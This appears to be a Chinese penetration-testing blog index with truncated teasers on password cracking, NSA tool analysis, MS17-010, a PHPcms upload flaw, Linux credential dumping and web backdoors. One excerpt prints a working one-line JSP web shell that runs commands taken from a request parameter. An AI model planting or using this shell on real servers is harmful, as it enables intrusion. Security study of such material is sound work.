一、简介 Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New ...
渗透测试
SlowHTTPTest安装出问题与解决
当安装SlowHTTPTest出现: checking for SSL_library_init in -lssl... no configure: error: OpenSSL-devel is missing 需要安装libssl-dev跟openssh,有的需要安装openssh-devel,但这里没有安装open...
Burp Suite 抓取部分https数据包失败的解决方法
解决Burp Suite 抓取部分https数据包失败的解决方法 Burp Suite作为一个渗透测试利器,在平时的工作和学习中经常使用到,通过设置代理的方式抓取通讯中的数据包,在使用中抓取http协议的通讯效果还是比较...
NSA武器库Esteemaudit技术解析
一、导语 继2017年5月12号肆虐全球的WannaCry勒索病毒攻击后,安全专家向正在使用Windows XP和Windows Server 2003的用户发出了安全警告,提防利用名为“Esteemaudit”的黑客工具进行的第二波网络攻击。“Esteemaud...
MS17-010漏洞检测与内网穿透技术的应用
0x00 前言 本文主要介绍一下MSF模块的下载、使用,以及当攻击机处于内网,而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下,并没有新的知识点,可以为刚入门的新手抛砖引玉,提供一条解决问...
jsp小后门
一:执行系统命令:无回显执行系统命令: 1 <%Runtime.getRuntime().exec(request.getParameter("i"));%> 请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls 执行之后...
linux下内网端口转发工具:linux版lcx 使用方法
这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上。但这个工具同样适用于运维工程师进行远程内网维护。 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网I...
PHPcms9.6.0 任意文件上传漏洞
phpcms9.6.0新版出现文件上传漏洞 对于PHPcms9.6.0 最新版漏洞,具体利用步骤如下: 首先我们在本地搭建一个php环境,我这里是appserv(只要可以执行php文件就行) 在根目录下新建一个txt文本文件里面...
Linux下密码抓取神器mimipenguin
前有Mimikatz,今有mimipenguin,近日国外安全研究员huntergregal发布了工具mimipenguin,一款Linux下的密码抓取神器,可以说弥补了Linux下密码抓取的空缺。 项目地址 https://github.com/huntergregal/mimipen...
盘点常见的Web后门
在对一个web站点进行渗透测试的渗透攻击阶段,一般会想办法突破上传限制,向目标可执行目录中写入一个带有攻击性质的脚本来协助获取更大的服务器权限。 这里我们就一起来盘点一下常用的web后门吧 大马与小马 ...